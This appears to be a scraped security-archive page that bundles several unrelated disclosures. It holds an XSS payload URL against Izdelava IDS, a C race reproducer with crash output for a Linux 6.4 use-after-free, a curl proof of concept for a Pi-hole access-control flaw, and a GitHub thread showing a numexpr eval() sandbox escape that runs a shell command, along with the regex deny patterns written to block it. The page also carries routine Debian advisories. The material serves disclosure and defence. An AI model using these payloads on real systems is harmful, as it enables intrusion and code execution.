Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

**Izdelava IDS 2.0 Cross Site Scripting**

Posted Sep 7, 2023

Authored by indoushka

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 0ef798585da30c6f8445d7bd8186a6b3603ee0ca8ce5383bd27b385d754bf05c

Download | Favorite | View

**Izdelava IDS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Izdelava IDS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://studiointera.net                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script>[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,139)
*   Arbitrary (16,235)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,289)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,499)
*   Encryption (2,370)
*   Exploit (52,056)
*   File Inclusion (4,227)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,791)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (859)
*   Kernel (6,717)
*   Local (14,491)
*   Magazine (586)
*   Overflow (12,701)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,604)
*   Python (1,535)
*   Remote (30,843)
*   Root (3,588)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,893)
*   Shell (3,192)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,208)
*   SQL Injection (16,403)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,811)
*   Web (9,691)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,988)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,828)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,638)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,823)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,885)
*   UNIX (9,305)
*   UnixWare (186)
*   Windows (6,582)
*   Other

Izdelava IDS 2.0 Cross Site Scripting

Debian Linux Security Advisory 5490-1 - Multiple security vulnerabilities have been discovered in aom, the AV1 Video Codec Library. Buffer overflows, use-after-free and NULL pointer dereferences may cause a denial of service or other unspecified impact if a malformed multimedia file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5490-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanySeptember 06, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : aomCVE ID         : CVE-2020-36130 CVE-2020-36131 CVE-2020-36133 CVE-2020-36135                 CVE-2021-30473 CVE-2021-30474 CVE-2021-30475Multiple security vulnerabilities have been discovered in aom, the AV1 VideoCodec Library. Buffer overflows, use-after-free and NULL pointer dereferencesmay cause a denial of service or other unspecified impact if a malformedmultimedia file is processed.For the oldstable distribution (bullseye), these problems have been fixedin version 1.0.0.errata1-3+deb11u1.We recommend that you upgrade your aom packages.For the detailed security status of aom please refer toits security tracker page at:https://security-tracker.debian.org/tracker/aomFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmT3rHBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSTUw//f5aA9QXBT7ro8HZITTZFs0LH6PAc12iyc3ajZDldlKnapdt3d/QmtNyPw/Xv+rG1gY/1/VJg0Id6mEXqpMuuDHQvv3db7QeAn2P/JWK+qnS7o/rxJdtqbtgkuiDQ79AbmCNG6Km7J5pZuvzW7zY5QKcLEwpG0Xzjn+Uf0prtw1nLQU8sVs/MWLFzWxIym8+QT+xwrjj5j5wfXzhmMQJxKLVhn12zV0ZHYJ6RR3eKDKCJNpTkYia+OdQF573X50sStBUrs8DBguRemWfkOdaBnqcDscFX0ody+UWwQ4a7b2PlN8U4cyhEQ92BgEL57afIo9nrIYT4hHKjEWzYKN/O/NGm3bDol2xFlJkiXQvpildPMPNVChpnqudPVz9A78qJDtyJ6P0/VTeLjhB8uJcSMZUoLNXzH4XwObd1uAHow8/tHl32WK+1CdVie1qfCpKscDEL7O+Mn315K3xu6WfQ+volXlsPn+NbDtRsNvnSvbTbEvhBWByr8VpCOG+oMdoHvzqL+4aIA1lL7aioLCBNYH2F4ZQX7DabnLfcpbWWHXqswNAlv5UL+McmDA84RJgGycQS77gbvTsPvYYw+iuGNDVHiI+jtIsAROqwmmwtOXNb61GZLe8JpokAkZClfhja3DOxZE+LaPWPFECxmHlIQRf1Q81h5whD97WNDSgYz8E==vlUG-----END PGP SIGNATURE-----

Debian Security Advisory 5490-1

Debian Linux Security Advisory 5489-1 - A buffer overflow was found in file, a file type classification tool, which may result in denial of service if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5489-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 04, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : fileCVE ID         : CVE-2022-48554A buffer overflow was found in file, a file type classification tool,which may result in denial of service if a specially crafted file isprocessed.For the oldstable distribution (bullseye), this problem has been fixedin version 1:5.39-3+deb11u1.We recommend that you upgrade your file packages.For the detailed security status of file please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/fileFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmT2NDVfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TNFg/+PpsDJJwxstMnU847dp8aR25v62Bboy3FRLrr16gbJozitu/uzsD9pdj7avI/WcpFaM2Y9in9odYhSccvgWcloq5o/MSm7IMplAm18O3D+m5pFdZw5GSIQKch3ZRl5F/37P6Kd2UQPXJoMhAUpNdL3LAjRjhfWji3LiWhNky+bOXLF3/TtPjhZutcffVoQ8Jvjd0U169i4s0i8lomMFs5AErReatFWbpRtWsGN1FYOUXpNa17n+sUwNaneWkthap+bkCINhFTzFCsiEd+QniY1Pyj8/V5EkWMYJzPPWLe0s93t2ORAGlMRmDzzCVEhtHWqOUz592DH9TqjJ8YeQtNd1o2KvTwYGWv63PN8ksoirFHYPqNj/hh6L4UuPc23tmNGtN7ErZnP45Z1SmSzAXVmm+YJjIjxO2qt2rg/DzdXXR8q/hR9FzYvlMQv058HQ67Vl1ua5d+66T8L7YgmJMoj6qDCJwmpRetfRPqOwucptPDlvRIYn23xSDQBkYFIbIPzoyvll+HYfhbkuvwa8hisK9PJfS5wEfU3Isp4CpKXhMkwNPgZyYFLqHt45Vbu1ROAy10Wwu18Lk+Vl9quUz5J0h3Go7Xuvk3xRx6NJPxRKiBGrqYhWcVw+bHgSn5oQCy0aNh4vzJy3bD8ZbQmXxiX/ytzN2TokgXBiIW6b3zGkM==kuBK-----END PGP SIGNATURE-----

Debian Security Advisory 5489-1

Debian Linux Security Advisory 5488-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5488-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
September 03, 2023                    https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581  
                 CVE-2023-4584

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:102.15.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:102.15.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT0cUsACgkQEMKTtsN8  
TjZyyg//amaTOqpvk6JD06P7vQkQoQ5fLFlu9QsLU0ziz4Xu+PRihErytIO8KKBu  
wqCTihgptvvxuAUEEjniQXU4LVRBoN9KnlOvDYxl4iIhNT0qiPBqccnGr4NE/WMI  
GXQKDDmbis9A9UimmPtNk8HXjtXAgEvqQY/ni73cWhPtmvAoKzcel6J0l4qMQBxG  
zR57rxNmizxNNqITloRRvWs8aNuKCj47lGlLLsoHjp1mqyCBR6RYr1+HBCLUXsuy  
8aVhqcVh7NrbrKu69UjAdCyHUb0h4U7mjjJwWDzUFi8LOWPsNu3seXHgL2U0LaqP  
+s2FxOI7N8augXx+lc4wArn692xxu6//QWCclQupYVcRDQOOdBs2BjElGKvD4VNL  
w3kj1cqMaaCEARaRrgKrx0szCQgy2ibtDgZ9RdaC2kc0xDdlTGopP3bBjjt1S4u6  
hvgJldUz8HdmOwcr6xQAj7bUpDXc7B7xeKWzZKE1rFksz76yF/eCDo+0vANy2vhd  
5q+ub2lziPwiF8IoCs26uKfYbTNI6SNwahHmY1nHLRxPHPqsitTG4ftBxJ8E4CN/  
pIX+rWAbNa/Er3XQeefVOASvWL2Nf/vOhtGsqiVopd2dGhv4vh2oY9w28YvIM786  
SlRceaM+7RGXXPPzWYxNWLTbIIkX/x8Gn8UCz+Wus9udIOIrbyU=/dxn  
-----END PGP SIGNATURE-----

Debian Security Advisory 5488-1

There is a race between mbind() and VMA-locked page faults in the Linux 6.4 kernel, leading to a use-after-free condition.

    Linux 6.4: UAF race between mbind() and VMA-locked page fault(tested on git master, at commit 57012c57536f)Summary:There's a race between mbind() and VMA-locked page faults, leading to UAF.You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.I'll send a suggested patch in a minute.mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:sys_mbind  kernel_mbind    do_mbind      mmap_write_lock      mbind_range [for each vma in range]        vma_replace_policy          new = mpol_dup(...)          old = vma->vm_policy          vma->vm_policy = new          mpol_put(old)      mmap_write_unlockVMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:do_user_addr_fault  lock_vma_under_rcu  handle_mm_fault    __handle_mm_fault      handle_pte_fault         do_pte_missing           do_anonymous_page             vma_alloc_zeroed_movable_folio               vma_alloc_folio                 get_vma_policy                   __get_vma_policy                     pol = vma->vm_policy    ***race***                     mpol_get(pol) [conditional on MPOL_F_SHARED]                 [do page allocation]                 mpol_cond_put(pol)  vma_end_readBecause of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:==============// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/mempolicy.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1L) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static char *vma;static void *fault_thread(void *arg) {  while (1) {    // fault in...    *vma = 1;    // ... and zero the PTE again with zap_page_range_single()    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));  }}static void mbind_vma(unsigned long policy) {  unsigned long nmask = (1UL << 0);  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));}int main(void) {  vma = SYSCHK(mmap((void*)0x100000, 0x1000,        PROT_READ|PROT_WRITE|PROT_EXEC,        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  pthread_t thread;  if (pthread_create(&thread, NULL, fault_thread, NULL))    errx(1, \"pthread_create\");  while (1) {    mbind_vma(MPOL_BIND);    mbind_vma(MPOL_INTERLEAVE);  }}==============This will give the following splat:==================================================================BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014Call Trace: <TASK> dump_stack_lvl+0x36/0x50 print_report+0xcf/0x660[...] kasan_report+0xc7/0x100[...] vma_alloc_folio+0x93/0x220 __handle_mm_fault+0x71b/0x1060[...] handle_mm_fault+0xbe/0x280 do_user_addr_fault+0x196/0x630 exc_page_fault+0x5c/0xc0 asm_exc_page_fault+0x26/0x30[...] </TASK>Allocated by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_slab_alloc+0x6e/0x70 kmem_cache_alloc+0xf5/0x260 __mpol_dup+0x72/0x1c0 vma_replace_policy+0x20/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8Freed by task 555: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 kmem_cache_free+0xaa/0x380 vma_replace_policy+0x87/0xb0 do_mbind+0x379/0x510 kernel_mbind+0x11a/0x130 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8[...]==================================================================If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-10-26.Found by: jannh@google.com

Linux 6.4 Use-After-Free / Race Condition

AdminTLE PiHole versions prior to 5.18 suffer from a broken access control vulnerability.

    # Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)# Date: 21.12.2022# Exploit Author: kv1to# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17# Tested on: Raspbian / Debian# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497# CVE : CVE-2022-23513In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.## Proof Of Concept with curl:curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'## HTTP requestsGET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1HOST: pi.holeCookie: [..SNIPPED..][..SNIPPED..]## HTTP ResponseHTTP/1.1 200 OK[..SNIPPED..]data: Match found in [..SNIPPED..]data: <domain>data: <domain>data: <domain>

AdminLTE PiHole Broken Access Control

Debian Linux Security Advisory 5487-1 - A security issue was discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5487-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 31, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4572Debian Bug     : 1024981A security issue was discovered in Chromium, which could result in theexecution of arbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 116.0.5845.140-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 116.0.5845.140-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTw5XQACgkQEMKTtsN8TjY4RQ//b6+fDtZKSmdGZi9IFFjHnEa3/qG2C6KcR13vwLJRysGoiFhu0B+58s2UU10Gdbo1/Qx6E5qwO0WaUHnlm2q56E8xt/MZ1C44lrI2/QByjnljX/BznbVu5IOmesgLz6Slf+L8goykVug6OW0cZpe5yiXL7Cg6qM9+K3e+7kIiif4DylYnOSHNZ4JprQE01W/6JziWeqcYEPpR4LoqhzRFQZQXRNdgKZWfy33dRmt+qWFE7eGpmLDltKcLe4A6iti3VxG5Ktn/fD84i41sjr4vM1PHrvuPwp1btLsgmbbZiElTBjpb6csAfOU/woGiwX7ak3iUW1l0sqoh2ksanmEZesvTpfBQ9BsfO8NrBmsJhmGNN+N8o5xroYFKhlt6+Xc9R7iRYBZxHQuohUjojKK0Nebh8QLL6oW+aMgxq4pVyDE3qwf7Rsd+V6Biq57Yq2MjLlzO7+y/VXs6fUyqjo/pKbgZADDXTYGzcq23eMJX15vvueeFLTR1ZasAwj9E2qgLl70+vecDLHpFXx2YBK2JYqUS1dZUHXQMr7PigOxFkF2U94bnhll/emcGgP7qpaPgC7KEjk8MPF+q3jLezSdzUdMLfUmUN9NR7a14euSr8blXSaZg30KPz6gVyvrUBpF6g1zJlDtcS2IYTkk2FtwzR2RpDgtFh5YZl/pnZ+VFrKE==LVjS-----END PGP SIGNATURE-----

Debian Security Advisory 5487-1

An issue in LanChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary code via the evaluate function in the numexpr library.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

corgeman opened this issue

Jul 7, 2023

· 35 comments

**Comments**

The evaluate() function eventually calls eval() on the data provided. eval() is extremely dangerous when supplied with user input and to my knowledge it isn't mentioned that the function does this. I would add a warning in the documentation about this. As a proof-of-concept, the following code should execute the command 'echo verybad' on your computer when ran:

import numexpr
s \= """
(lambda fc=(
    lambda n: \[
        c for c in 
            ().\_\_class\_\_.\_\_bases\_\_\[0\].\_\_subclasses\_\_() 
            if c.\_\_name\_\_ == n
        \]\[0\]
    ):
    fc("function")(
        fc("Popen")("echo verybad",shell=True),{}
    )()
)()
"""
numexpr.evaluate(s)

Yeah developers seem to be using NumExpr more and more as a parser for handling input from a UI. It would be much safer if we could use ast.parse instead. I think adding a warning to the docs is fine, but it would also make sense to me to add an optional sanitizer. We could search the string for various Python keywords that have no business being in an expression, such as:

1.  import
2.  lambda
3.  eval
4.  __ (dunder)
5.  locals
6.  globals

Sanitization could be enabled by default but give the user the means to turn it off.

Alright I implemented a check in 4b2d89c that forbids certain operators used in the expression. Namely: ;, :, [, and __. As far as I can tell this defeats all of the commonly cited attack vectors against eval(). I.e. it bans multiple expressions, lambdas, indexing, and all the dunders. If we want to be very safe, we would want to ban . as a character. However, this is difficult because . is both the reference operator and the decimal operator.

If we want to ban . we could do so if we require it to be followed by a numeral. E.g. 0.1 would pass the check, os.remove would not pass the check. However, this would ban valid Python code such as a * 5. which is a shorthand for casting to double. Perhaps there is someone out their with better regex-foo than myself and can suggest a solution for a regex that bans the Python . operator but doesn't cause issues for decimal points?

Regardless I think this is a good step forward and we're at the point where we should do a new release.

Ok, made some more improvements. I can ban attribute access to everything but .real and .imag, via

_forbidden_re = re.compile('[\;[\:]|__|\.[abcdefghjklmnopqstuvwxyzA-Z_]')

I also strip the string of all whitespace beforehand.

Closing with release of 2.8.5.

Hi @robbmcleod, just wanted to point out that you can still access other attributes because Python translates some utf chars into ascii chars automatically (mainly greek alphabet used in math), thus:

    numexpr.evaluate("(3+1).ᵇit_count()")
    

Results in:

It might be better to whitelist real and imag rather than blacklist chars.

@jan-kubena ok thanks for the heads up. The trouble here is that decimal needs to work, and numbers can appear in variable names, but not at the start. Do you happen to know where the documentation for which character sets are mangled is?

The really proper way to do it would be to back-port the ast parser work I did in for my attempt at making 3.0.

Apparently the pandas group is using dunders as private variables in some of their NumExpr calls.

pandas-dev/pandas#54449

I'm of two minds about this. I could regex against "**\[a-zA-Z0-9\_\]+**" instead of just "\_\_". But for the security conscious, it does feel to me that NumExpr shouldn't be able to access private variables in the locals and globals dictionaries.

Hi folks,

I have a simpler example which also breaks in the new version:

import pandas as pd

name \= "Mass (kg)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` < 300")

    ValueError: Expression (BACKTICK_QUOTED_STRING_Mass__LPAR_kg_RPAR_) < (300) has forbidden control characters.
    

I understand Mass (kg) is a reasonable column name, so the validation definitely needs more tuning.

Hi folks,  
I'm not sure if it is the same issue here, we are using numexpr for calculations in a pandas dataframe and we are using double underscore in some of our calculations (for instance, a__b) but now it fails in 2.8.5 (working in 2.8.4).  
I have a minimal example without involving pandas:

import numexpr
numexpr.evaluate('a\_\_b / 2', {'a\_\_b': 4})

Or a oneliner:

python -c "import numexpr; print(numexpr.evaluate('a__b / 2', {'a__b': 4}))"

In numexpr==2.8.4 that one works perfectly.  
In numexpr==2.8.5 we have the following:  
ValueError: Expression a__b / 2 has forbidden control characters.

Is it an intentional feature or something that can be workedaround easily (sending some kwarg to ignore the error)?  
We will pin our numexpr requeriments to "<2.8.5" in the meanwhile.

Many thanks!

@nicoddemus and @zorion, just waiting to hear back from Pandas' devs on the original report: pandas-dev/pandas#54449 before I do anything. I've tried in the past to establish some sort of line of communication with them and gotten crickets.

Hi, thanks for your reply.

I think we are having a legit use of dunder but it is not allowed in a breaking change from 2.8.4 to 2.8.5 so we have to fix our version to 2.8.4 (or lower) and this is an ok workaround for now.  
On the other hand, if we had a way to flag "evaluate" that we trust our input we may remove this version restriction. Is it possible to do so?

Many thanks in advance!

> @nicoddemus and @zorion, just waiting to hear back from Pandas' devs on the original report: pandas-dev/pandas#54449 before I do anything. I've tried in the past to establish some sort of line of communication with them and gotten crickets.

Hi, one of the pandas devs here.

I don't maintain the eval code (I don't think anyone still here does anymore), so not really the best person to comment on this.

Is there a way to gate this stricter checking behind an option?  
(For pandas, we have a warning in the docs saying that eval will let users run arbritary code)

Thanks,  
Thomas

@lithomas1 and company,

I see a few approaches here.

1.  We can deprecate the implementation of the __ filter for a immediate release and put it back in for a future release.
2.  We can put in an option to disable the security check. However, I do think it should default to be on.

In order to avoid forcing everyone to do an emergency release, we probably need to do both, assuming the option defaults to sanitize.

> @lithomas1 and company,
> 
> I see a few approaches here.
> 
> 1.  We can deprecate the implementation of the __ filter for a immediate release and put it back in for a future release.
> 2.  We can put in an option to disable the security check. However, I do think it should default to be on.
> 
> In order to avoid forcing everyone to do an emergency release, we probably need to do both, assuming the option defaults to sanitize.

Thanks, this sounds good to me.  
2 is probably good enough for pandas.  
(We are going to be releasing soon anyways in a couple weeks. I think users can be fine pinning numexpr for now).

It would be nice to actually fix pandas, however, I'm not too sure what the future of eval/query will be given its current "zombie"-like state.

There's actually _two_ changes in numexpr 2.8.5 that fail pandas tests - this, and a change to integer overflow behaviour (possibly a result of the negative-powers changes, but I'm not sure yet) pandas-dev/pandas#54546

@rebecca-palmer You can make a new issue if you want, but NumExpr could never cover 2**100 as that's way in excess of 64-bit integers.

@zorion, @nicoddemus, @lithomas1 I made a push in 397cc98 that should hopefully fix these issues, if you could please test?

1.  I improved the blacklisting. It should better match the funny unicode coercion that can be done for the attribute access attack.
2.  It only blocks dunders and not a single double underscore.
3.  You can disable it by calling validate(..., sanitize=False) or equivalently evaluate(..., sanitize=False).

If you have a chance please test and provide me with any feedback you may have.

Hi @robbmcleod,

Thanks for attempting a fix.

My original example now passes, but this one breaks (reduced from the actual code):

import pandas as pd

name \= "II (MM)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` >= 3.1e-05")

    ValueError: Expression (BACKTICK_QUOTED_STRING_II__LPAR_MM_RPAR_) >= (3.1e-05) has forbidden control characters.
    

The problem in this case seems to be the scientific notation, if I change 3.1e-05 to something that does not format to scientific (say 0.31) then it no longer errors out. If I use the actual number in decimal notation (0.000031) it still fails because it seems internally it formats back to scientific, because it generates the exact same message as above (with 3.1e-05):

import pandas as pd

name \= "II (MM)"
df \= pd.DataFrame({name: \[200, 300, 400\]})
df.query(f"\`{name}\` >= 0.000031")

    ValueError: Expression (BACKTICK_QUOTED_STRING_II__LPAR_MM_RPAR_) >= (3.1e-05) has forbidden control characters.
    

sanitize=False would be great for us, however we call DataFrame.query which does not have that argument yet.

@nicoddemus @robbmcleod I think changing \_attr\_pat to r'.\\b(?!(real|imag|\\d+e?)\\b)' (i.e. adding 'e?') fixes that, but I haven't actually tested it.

Perhaps a more reliable approach would be to use ast.parse, and reject the tree if we find statements, lambdas, dunder import, etc?

@robbmcleod I've added some comments in the commit - do those notify anyone when it's already on the main branch?

It needs to match [eE]?[+-]?. I.e. either 'e' or 'E' can denote scientific notation and then it can be '-' or '+' exponents. It's not a big deal, I just haven't had time to sit down and do it yet. Please be patient.

I definitely don't get notifications on commits.

@nicoddemus I did use ast.parse for the NumExpr-3.0 branch. This is not a trivial fix to backport it. NumExpr 2 has an home-brew AST.

I think that most of the comments are in 397cc98

@robbmcleod Sorry if that looked like a demand to hurry - it was not intended as such, but as a guess that comments that don't notify anyone might _never_ get seen.

Debian now has my version, but it hasn't been through their CI yet.

I'm not sure if I should create a whole new issue for this, but the changes in this commit (which made it into 2.8.5) raise DeprecationWarning: invalid escape sequence '\;' due to the usage \; here, which turns into errors in some CI setups. I left a review comment in 397cc98 to that effect, as well. I can surface this as a bug report of its own if you like.

9b380ae switched to _attr_pat = r'\.\b(?!(real|imag|[eE]?[+-]?\d+)\b)', which probably won't do what you want - I suggest _attr_pat = r'\.\b(?!(real|imag|\d+([eE][+-]?\d+)?)\b)' but I haven't tested that

(The tests don't notice because they use test values without a . (2e-5 not 2.1e-5), which never triggered this issue to begin with. We should maybe change that.)

@rebecca-palmer I don't understand, the point is to disable attribute access. Variable/member names in Python cannot start with a number. So 2.1e-5 should never match the regex because a variable cannot start with 1, for example.

@robbmcleod (?!...) means "does **not** match this", so the items inside the (?!...) (.real, .imag, and numbers with a decimal point) are allowed while other uses of . (other attribute access) are blocked.

kozalosev added a commit to kozalosev/textUtilsBot that referenced this issue

Aug 25, 2023

If no one can think of adding any more tests to this I'll prepare another release?

I'll try and test locally against Pandas as well.

This is out of topic for this issue, but related: is there a link to a discussion to the decision to introduce this check? I ask because using a regex for this seems fragile (as this issue proves), plus the rationale itself seems a bit misguided: if it uses eval behind the covers, I think it would be best to warn users of that fact instead of trying to check that nothing fancy is going on -- because no matter how much the check is well done, it might contain flaws, which will eventually will be passed on to eval, which is a security concern. Perhaps it would make more sense to just let users know that the string is passed on to eval, and the same security concerns apply here.

Ah sorry @rebecca-palmer, seem to have missed it.

I see the suggestion of adding a warning to the docs was given, and then decided to implemented a sanitizer. OK, thanks.

CVE-2023-39631: Warn that evaluate() should not be used on user input · Issue #442 · pydata/numexpr

Debian Linux Security Advisory 5486-1 - An invalid memory access was discovered in json-c, a JSON library which could result in denial of service.

